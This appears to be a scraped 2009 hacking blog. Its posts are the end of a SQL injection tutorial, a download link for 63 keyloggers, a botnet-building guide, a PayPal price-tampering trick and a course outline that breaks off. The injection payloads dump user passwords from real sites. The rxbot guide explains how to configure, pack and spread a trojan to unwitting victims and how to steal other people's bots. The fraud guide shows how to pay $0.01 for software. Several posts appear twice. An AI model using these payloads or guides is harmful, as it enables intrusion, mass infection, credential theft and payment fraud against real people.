http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --
and then you would check the table name like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE table_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --
You would continue adding ,'table_name' until you finally got to the admins table (if there is one!)
Keep in mind magic quotes must be off for this. Again, you will found out how to bypass magic quotes in times like this later.
Now lets say the mysql version was only 4 and information_schema IS NOT present. So we would have to use another method to try to get the tables/columns of our interest. Basically, you would first look in the errors and see if it discloses the whole query or atleast the table and column (etc Mysql Error in 'userpass FROM users where id=1''), and the then resort to good old guessing. These two steps mainly revolve around luck and poor error message configuration.
So let me explain the error method first. Lets say you do this:
http://site.com/script.php?id=1'
and get the error:
MySQL Syntax Error in the query 'SELECT name FROM sb_news WHERE id = 1''
In the above example, the tables have a prefix (sb). Prefixes are usually present in each table if their in one and are very common in sites. Now that you know the prefix, you would guess sb_users, sb_members, sb_admins, sb_accounts, etc. You see that the column has no prefix, so after you get the table you would try username, password, user_password, user_pass, login, etc... If the error was
MySQL Syntax Error in the query 'SELECT name FROM news WHERE id = 1''
Then you would know the columns have no prefix and you wouldnt have to guess with the prefix. However errors like this are very uncommon. A more common error would be:
Mysql Error: Syntax error by '1' AND g_embedable=1 LIMIT 1' at line 1
This would show you the column name in the particular table. This would be useful because you can now assume either all the columns in the database have the g_ prefix, or you could somehow figure out why it has the prefix (for example, if it was a page of games, you could guess that g stood for games), then see how you can modify it for the users table (so if the table was users, it could be u_password, u_pass, u_username, u_user, u_login, etc). Of course, you would have to straight out guess the tables and if they had prefixes.
But once you have this info, how exactly do you check if the table/column exists? You would use a union all select that selected null (nothing) from the table youre guessing. For example:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null FROM table (remember to use the right number of columns)
Now if you get an error saying Mysql Error: Table 'table' Not found in script.php on line 7 or any error similar, you know the table doesnt exist.
Once you have guessed the table correctly, then you would have to guess the column. You would do this by changing a null to the column name you guessing and seeing if there was an error. For example:
http://site.com/script.php?id=1' UNION ALL SELCT null,null,password from users
If there is no error and the page loads, then you know the column is password. If there is an error saying invalid column, you have to keep guessing. Remember to use a column that does NOT cause a conversion error since the error may be misleading.
Now that you have the column and table you want to steal data from, well move on to the next step!:
Subsection 2.9 - Step 8)Get your data
This is the final part of this tutorial, and easy as hell!
So we have our table and column. Lets say the table is users and the two columns you got are username and password. So all we have to do to get the data from those columns is use a simple select query in our url and limit to sift through the rows! So with username and password in table users, we would do this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,username FROM users --
Then check the page where the data is displayed and youll see the username!
Now for the password:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --
Then check the page where the username was and you’ll see the password! Now, instead of doing two separate queries for the username and password, there are two ways to get the data out at the same time.
The first is if two columns display data to the page. Say columns 2 and 3 displayed data in our UNION ALL SELECT null,null,null. So we would do
http://site.com/script.php?id=1' UNION ALL SELECT null,username,password FROM users --
Then you can look on the page for the username AND password. But they are on different parts of the page, arent they? To get them together, we can use the function concat(). Concat joins strings. the syntax is concat(string1,string2,etc). You can put in as many strings as you want separated by commas. You can either use column_names or actual strings enclosed by 's (magic quotes must be off). The benefit is the data is together and we only need one column that outputs.
So we can do this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,password) FROM users --
But then there would be no distinction between the username and password. So we should add an --- between them. So we could do concat(username,'---',password). Again, magic quotes MUST be off for this to work. An example would be:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) --
Then you will see the username and password separated by ---'s on the page!
Now, what if you didn’t want the first users password? Then you would use limit as I discussed earlier. You would tell limit to start from the 2nd row (which is actually 1 for computers since 0 is the first) and to choose 1 row (limit 1,1). So you would do
http://site.com/script.php?id=1’ UNION ALL SEELCT null,null,concat(username, ‘---‘, password) limit 1,1 –
Then you would check the page again and in the place you saw the previous username and password you would see the second users in the same exact format. Now if you wanted the next user, you would change limit 1,1 to limit 2,1, then the next would be limit 3,1, etc etc until you have all the users you want!
And that concludes part I of my tutorial! Hope you liked it!
Sunday, January 25, 2009
63 Keyloggers Ready For Download
http://rapidshare.com/files/106017345/KEYLOGGERS_THEBEST.rar
1 007 Keylogger Spy Software 3.873
2 Active Key Logger 2.4
3 Activity Keylogger 1.80.21
4 Activity Logger 3.7.2132
5 ActMon Computer Monitoring 5.20
6 Actual Spy 2.8
7 Advanced Invisible Keylogger v1.9
8 Advanced Keylogger 1.8
9 Ardamax Keylogger 2.9
10 BlazingTools Perfect Keylogger 1.68
11 Blazingtools Remote Logger v2.3
12 Data Doctor KeyLogger Advance v3.0.1.5
32 Local Keylogger Pro 3.1
14 ExploreAnywhere Keylogger Pro 1.7.8
15 Family Cyber Alert 4.06
16 Family Keylogger 2.80
17 Firewall bypass Keylogger 1.5
18 Free Keylogger 2.53
19 Ghost Keylogger 3.80
20 Golden Eye 4.5
21 Golden KeyLogger 1.32
22 Handy Keylogger 3.24 build 032
23 Home Keylogger 1.77
24 Inside Keylogger 4.1
25 iOpus Starr PC and Internet Monitor 3.23
26 iSpyNow v2.0
27 KeyScrambler 1.3.2
28 Keystroke Spy 1.10
29 KGB Keylogger 4.2
30 KGB Spy 3.84
31 LastBit Absolute Key Logger 2.5.283
32 Metakodix Stealth Keylogger 1.1.0
33 Network Event Viewer v6.0.0.42
34 OverSpy v2.5
35 PC Activity Monitor Professional 7.6.3
36 PC Spy Keylogger 2.3 build 0313
37 PC Weasel 2.5
38 Personal PC Spy v1.9.5
39 Power Spy 6.10
40 Powered Keylogger v2.2.1.1920
41 Quick Keylogger 2.1
42 Radar 1.0
43 Real Spy Monitor 2.80
44 Real Spy Monitor 2.80
45 Remote Desktop Spy 4.04
46 Remote KeyLogger 1.0.1
47 Revealer Keylogger Free 1.33
48 SC Keylogger Pro 3.2
49 Smart Keystroke Recorder Pro
50 Spector Pro 6.0.1201
51 SpyAnytime PC Spy 2.42
52 SpyBuddy 3.7.5
53 Spytech SpyAgent 6.02.07
54 Spytector 1.3.5
55 Stealth Key Logger 4.5
56 System keylogger 2.0.0
57 Tim's Keylogger 1.0
58 Tiny Keylogger 2.0
59 Total Spy 2.7
60 Windows Keylogger 5.04
61 Win-Spy Pro 8.9.109
62 XP Advanced Keylogger 2.5
63 XPCSpy Pro version 3.01
1 007 Keylogger Spy Software 3.873
2 Active Key Logger 2.4
3 Activity Keylogger 1.80.21
4 Activity Logger 3.7.2132
5 ActMon Computer Monitoring 5.20
6 Actual Spy 2.8
7 Advanced Invisible Keylogger v1.9
8 Advanced Keylogger 1.8
9 Ardamax Keylogger 2.9
10 BlazingTools Perfect Keylogger 1.68
11 Blazingtools Remote Logger v2.3
12 Data Doctor KeyLogger Advance v3.0.1.5
32 Local Keylogger Pro 3.1
14 ExploreAnywhere Keylogger Pro 1.7.8
15 Family Cyber Alert 4.06
16 Family Keylogger 2.80
17 Firewall bypass Keylogger 1.5
18 Free Keylogger 2.53
19 Ghost Keylogger 3.80
20 Golden Eye 4.5
21 Golden KeyLogger 1.32
22 Handy Keylogger 3.24 build 032
23 Home Keylogger 1.77
24 Inside Keylogger 4.1
25 iOpus Starr PC and Internet Monitor 3.23
26 iSpyNow v2.0
27 KeyScrambler 1.3.2
28 Keystroke Spy 1.10
29 KGB Keylogger 4.2
30 KGB Spy 3.84
31 LastBit Absolute Key Logger 2.5.283
32 Metakodix Stealth Keylogger 1.1.0
33 Network Event Viewer v6.0.0.42
34 OverSpy v2.5
35 PC Activity Monitor Professional 7.6.3
36 PC Spy Keylogger 2.3 build 0313
37 PC Weasel 2.5
38 Personal PC Spy v1.9.5
39 Power Spy 6.10
40 Powered Keylogger v2.2.1.1920
41 Quick Keylogger 2.1
42 Radar 1.0
43 Real Spy Monitor 2.80
44 Real Spy Monitor 2.80
45 Remote Desktop Spy 4.04
46 Remote KeyLogger 1.0.1
47 Revealer Keylogger Free 1.33
48 SC Keylogger Pro 3.2
49 Smart Keystroke Recorder Pro
50 Spector Pro 6.0.1201
51 SpyAnytime PC Spy 2.42
52 SpyBuddy 3.7.5
53 Spytech SpyAgent 6.02.07
54 Spytector 1.3.5
55 Stealth Key Logger 4.5
56 System keylogger 2.0.0
57 Tim's Keylogger 1.0
58 Tiny Keylogger 2.0
59 Total Spy 2.7
60 Windows Keylogger 5.04
61 Win-Spy Pro 8.9.109
62 XP Advanced Keylogger 2.5
63 XPCSpy Pro version 3.01
BOTS
There are many tutorials around but I thought I would post one to help people.
In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:
Code:
http://rapidshare.com/files/28549191/rx-asn-2-re-worked_v3.rar.html
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers "bots" the attacker, the server, and the victim.
Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Code:
http://rapidshare.com/files/18798734/DonttCare_Server_Editor_TuT..html
Here we go ladies and gentlemen
Follow the tutorial:
I. Setting up the C++ compilier: (easy)
Download
Code:
http://www.megaupload.com/?d=SUHPYZRX
Code:
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
Code:
http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
After that Download and install:
Windows SDK (1.2 mb)
Code:
http://www.megaupload.com/?d=YH3SS78I
Pass: itzforblitz
II. Configuring the C++ compilier (easy)
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows)
(it does not matter whats below those lines)
III. Configuring your bot: (easy)
1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Code:
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
IV. Building your bot: (very easy)
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
This image has been resized. Click this bar to view the full image. The original image is sized 800x476.
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
Command list
Download Command list
Code:
http://rapidshare.com/files/21542921/cmands.html
Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC
Code:
http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2150_4-10001733&ontId=2150_4&spi=037458d618c9304926b7944fed9d4095&lop=link&tag=tdw_dltext<ype=dl_dlnow&pid=10873492&mfgId=50355&merId=50355&pguid=94gKyQoPjAQAADdnUHYAAAAu&destUrl=http%3A%2F%2Fwww.download.com%2F3001-2150_4-10873492.html%3Fspi%3D037458d618c9304926b7944fed9d4095%26part%3Ddl-mIRC
How to secure your bots:
Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
Quote:
@update
Code:
http://www.mybot.com/download/SMSPRO.exe
82
The
Code:
http://mybot.com
is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This image has been resized. Click this bar to view the full image. The original image is sized 640x460.
This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
Good IRC Servers:
I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all
In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:
Code:
http://rapidshare.com/files/28549191/rx-asn-2-re-worked_v3.rar.html
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers "bots" the attacker, the server, and the victim.
Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Code:
http://rapidshare.com/files/18798734/DonttCare_Server_Editor_TuT..html
Here we go ladies and gentlemen
Follow the tutorial:
I. Setting up the C++ compilier: (easy)
Download
Code:
http://www.megaupload.com/?d=SUHPYZRX
Code:
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
Code:
http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
After that Download and install:
Windows SDK (1.2 mb)
Code:
http://www.megaupload.com/?d=YH3SS78I
Pass: itzforblitz
II. Configuring the C++ compilier (easy)
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
4. Now put them in this order: (use up and down arrows)
(it does not matter whats below those lines)
III. Configuring your bot: (easy)
1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Code:
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password
Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass
IV. Building your bot: (very easy)
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
This image has been resized. Click this bar to view the full image. The original image is sized 800x476.
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
Command list
Download Command list
Code:
http://rapidshare.com/files/21542921/cmands.html
Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
Download mIRC
Code:
http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2150_4-10001733&ontId=2150_4&spi=037458d618c9304926b7944fed9d4095&lop=link&tag=tdw_dltext<ype=dl_dlnow&pid=10873492&mfgId=50355&merId=50355&pguid=94gKyQoPjAQAADdnUHYAAAAu&destUrl=http%3A%2F%2Fwww.download.com%2F3001-2150_4-10873492.html%3Fspi%3D037458d618c9304926b7944fed9d4095%26part%3Ddl-mIRC
How to secure your bots:
Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
Quote:
@update
Code:
http://www.mybot.com/download/SMSPRO.exe
82
The
Code:
http://mybot.com
is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This image has been resized. Click this bar to view the full image. The original image is sized 640x460.
This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
Good IRC Servers:
I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all
Saturday, January 24, 2009
[TUT] Get anything for $0.01 from paypal
Note: It won't work on products because it sends the seller an email along the lines of "you have received $0.01 from (your paypal name) for (the product)". This works ONLY on automated software scripts where it detects that you gave a payment and emails you a link to download the software.
Also, this is an educational only guide. I don't know if is legal on some countries or all.
You only need FireFox and the Tamper Data plugin.Install it as usual and restart FireFox.
Go to Tools -> Tamper data to open the plugin's window.
Don't click anything yet.
Now go to any page you want to buy something (for example ebook). Note, you need to find a place that supports paypal or paypal shopping carts.
[Image: 1232737021024647100.png]
Now, before do anything, go back to Tamper's window and press "Start Tamper".
[Image: 1232737234031307500.png]
Don't visit any other site and don't click any other link. YOU ONLY NEED to click on the link from the site that will redirects you to paypal.
The Tamper with request window will pop up. Click the Tamper button.
[Image: 1232737276006250200.png]
Now, you need to modify the post variables.
Find the parameter called amount and change the value to 0.01 because that is the lowest amount PayPal will process. When you are done click the OK button at the bottom of the window.
[Image: 1232737308052686400.png]
You will go to paypal's page.
You are done.
Also, this is an educational only guide. I don't know if is legal on some countries or all.
You only need FireFox and the Tamper Data plugin.Install it as usual and restart FireFox.
Go to Tools -> Tamper data to open the plugin's window.
Don't click anything yet.
Now go to any page you want to buy something (for example ebook). Note, you need to find a place that supports paypal or paypal shopping carts.
[Image: 1232737021024647100.png]
Now, before do anything, go back to Tamper's window and press "Start Tamper".
[Image: 1232737234031307500.png]
Don't visit any other site and don't click any other link. YOU ONLY NEED to click on the link from the site that will redirects you to paypal.
The Tamper with request window will pop up. Click the Tamper button.
[Image: 1232737276006250200.png]
Now, you need to modify the post variables.
Find the parameter called amount and change the value to 0.01 because that is the lowest amount PayPal will process. When you are done click the OK button at the bottom of the window.
[Image: 1232737308052686400.png]
You will go to paypal's page.
You are done.
Thursday, January 22, 2009
Hacking
Acking Training Course HAcking Training Course
Package Includes:
Featuring live instructor-led classroom sessions with full audio, video and demonstration components
Printable courseware
300+ Penetration Testing Review Questions
eWorkbook - 725 pages Student eWorkbook by Logical Security
Module 1
* Ethical Hacking and Penetration Testing
* Security 101
* Hacking Hall of Fame
* What are Today's hackers Like?
* Today's Hackers
* Risk Management
* Evolution of Threats
* Typical Vulnerability Life Cycle
* What is Ethical Hacking?
* Rise of the Ethical Hacker
* Types of Security Test
* Penetration Test (Pen-test)
* Red Teams
* Testing Methodology
* VMWare Workstation
* Windows and Linux Running VMWare
* Linux Is a Must
* Linux Survival Skills
* Useful vi Editor Commands
* Module 1 Review
Module 2
* Footprinting and Reconnaissance
* Desired Information
* Find Information by the Target (Edgar)
* terraserver.microsoft.com
* Network Reconnaissance & DNS Search
* Query Whois Databases
* Command-Line Whois Searches
* ARIN whois: Search IP Address Blocks
* SamSpade Tool and Website
* Internet Presence
* Look Through Source Code
* Mirror Website
* Find Specific Types of Systems
* Big Brother
* AltaVista
* Specific Data Being Available?
* Anonymizers
* Countermeasures to Information Leakage
* Social Engineering
* DNS Zone Transfer
* Nslookup command-line utility
* Zone Transfer from Linux
* Automated Zone Transfers
* Zone Transfer Countermeasures
* www.CheckDNS.net
* Tracing Out a Network Path
* tracert Output
* Free Tools
* Paratrace
* War Dialing for Hanging Modems
* Manual and Automated War Dialing
* Case Study
* Guide Dogs for the Blind: Pairing blind people with Guide Dogs since 1942
* Footprinting Countermeasures
* Demo - Footprinting & Info Gathering
* Module 2 Review
Module 3
* TCP/IP Basics and Scanning
* The OSI Model
* TCP/IP Protocol Suite Layers
* Encapsulation
* Data-Link Protocols
* IP - Internet Protocol, Datagram (Packet)
* ICMP Packets
* UDP – User Datagram Protocol
* UDP Datagram
* TCP – Transmission Control Protocol
* TCP Segment
* TCP/IP 3-Way Handshake and Flags
* TCP and UDP Ports
* Ping Sweeps
* Good Old Ping, Nmap, TCP Ping Sweep
* TCP Sweep Traffic Captured
* Unix Pinging Utilities
* Default TTLs
* Pinging Countermeasures
* Port Scanning
* Nmap
* Advanced Probing Techniques
* Scanrand
* Port Probing Countermeasures
* Watch Your Own Ports
* Demo - Scanning Tools
* Module 3 Review
Module 4
* Enumeration and Verification
* Operating System Identification
* Differences Between OS TCP/IP Stack
* Nmap -O
* Active vs Passive Fingerprinting
* Xprobe/Xprobe2
* Countermeasures
* SNMP Overview
* SNMP Enumeration
* SMTP, Finger, and E-mail Aliases
* Gleaning Information from SMTP
* SMTP E-mail Alias Enumeration
* SMTP Enumeration Countermeasures
* CIFS/SMB
* Attack Methodology
* Find Domains and Computers
* NetBIOS Data
* NBTscan
* NULL Session
* Local and Domain Users
* Find Shares with net view
* enum: the All-in-one
* Winfo and NTInfoScan (ntis.exe)
* Digging in the Registry
* NetBIOS Attack Summary
* NetBIOS Countermeasures
* What’s this SID Thing Anyway?
* Common SIDs and RIDs
* whoami
* RestrictAnonymous
* USER2SID/SID2USER
* psgetsid.exe and UserDump Tool
* LDAP and Active Directory
* GUI Tools to Perform the Same Actions
* Demo - Enumeration
* Module 4 Review
Module 5
* Hacking & Defending Wireless/Modems
* Phone Numbers & Modem Background
* Phone Reconnaissance
* Modem Attacks
* Wireless Reconnaissance
* Wireless Background
* Wireless Reconnaissance Continued
* Wireless Sniffing
* Cracking WEP Keys
* Defending Wireless
* Module 5 Review
Module 6
* Hacking & Defending Web Servers
* Web Servers in General: HTTP
* Uniform Resource Locator: URL
* Apache Web Server Functionality
* Apache: Attacking Mis-configurations
* Apache: Attacking Known Vulnerabilities
* Defending Apache Web Server
* Microsoft Internet Information Server (IIS)
* IIS: Security Features
* IIS: Attacking General Problems
* IIS: IUSER or IWAM Level Access
* IIS: Administrator or Sys Level Access
* IIS: Clearing IIS Logs
* IIS: Defending and Countermeasures
* Web Server Vulnerability Scanners
* Demo - Hacking Web Servers
* Module 6 Review
Module 7
* Hacking & Defending Web Applications
* Background on Web Threat & Design
* Basic Infrastructure Information
* Information Leaks on Web Pages
* Hacking over SSL
* Use the Source, Luke…
* Functional/Logic Testing
* Attacking Authentication
* Attacking Authorization
* Debug Proxies: @stake webproxy
* Input Validation Attacks
* Attacking Session State
* Attacking Web Clients
* Cross-Site Scripting (XSS) Threats
* Defending Web Applications
* Module 7 Review
Module 8
* Sniffers and Session Hijacking
* Sniffers
* Why Are Sniffers so Dangerous?
* Collision & Broadcast Domains
* VLANs and Layer-3 Segmentation
* tcpdump & WinDump
* Berkley Packet Filter (BPF)
* Libpcap & WinPcap
* BUTTSniffing Tool and dSniff
* Ethereal
* Mitigation of Sniffer Attacks
* Antisniff
* ARP Poisoning
* MAC Flooding
* DNS and IP Spoofing
* Session Hijacking
* Sequence Numbers
* Hunt
* Ettercap
* Source Routing
* Hijack Countermeasures
* Demo - Sniffers
* Module 8 Review
Module 9
* Hacking & Defending Windows Systems
* Physical Attacks
* LANMan Hashes and Weaknesses
* WinNT Hash and Weaknesses
* Look for Guest, Temp, Joe Accounts
* Direct Password Attacks
* Before You Crack: Enum Tool
* Finding More Account Information
* Cracking Passwords
* Grabbing the SAM
* Crack the Obtained SAM
* LSA Secrets and Trusts
* Using the Newly Guessed Password
* Bruteforcing Other Services
* Operating System Attacks
* Hiding Tracks: Clearing Logs
* Hardening Windows Systems
* Strong 3-Factor Authentication
* Creating Strong Passwords
* Authentication
* Windows Account Lockouts
* Auditing Passwords
* File Permissions
* Demo - Attacking Windows Systems
* Module 9 Review
Module 10
* Hacking & Defending Unix Systems
* Physical Attacks on Linux
* Password Cracking
* Brute Force Password Attacks
* Stack Operation
* Race Condition Errors
* Format String Errors
* File System Attacks
* Hiding Tracks
* Single User Countermeasure
* Strong Authentication
* Single Sign-On Technologies
* Account Lockouts
* Shadow Password Files
* Buffer Overflow Countermeasures
* LPRng Countermeasures
* Tight File Permissions
* Hiding Tracks Countermeasures
* Removing Unnecessary Applications
* DoS Countermeasures
* Hardening Scripts
* Using SSH & VPNs to Prevent Sniffing
* Demo - Attacking Unix Systems
* Module 10 Review
Module 11
* Rootkits, Backdoors, Trojans & Tunnels
* Types Of Rootkits
* A Look at LRK
* Examples of Trojaned Files
* Windows NT Rootkits
* NT Rootkit
* AFX Windows Rootkit 2003
* Rootkit Prevention Unix
* Rootkit Prevention Windows
* netcat
* netcat: Useful Unix Commands
* netcat: What it Looks Like
* VNC-Virtual Network Computing
* Backdoor Defenses
* Trojans
* Back Orifice 2000
* NetBus
* SubSeven
* Defenses to Trojans
* Tunneling
* Loki
* Other Tunnels
* Q-2.4 by Mixter
* Starting Up Malicious Code
* Defenses Against Tunnels
* Manually Deleting Logs
* Tools to Modify Logs
* Demo - Trojans
* Module 11 Review
Module 12
* Denial of Service and Botnets
* Denial-of-Service Attacks
* CPUHog
* Ping of Death
* Teardrop Attacks
* Jolt2
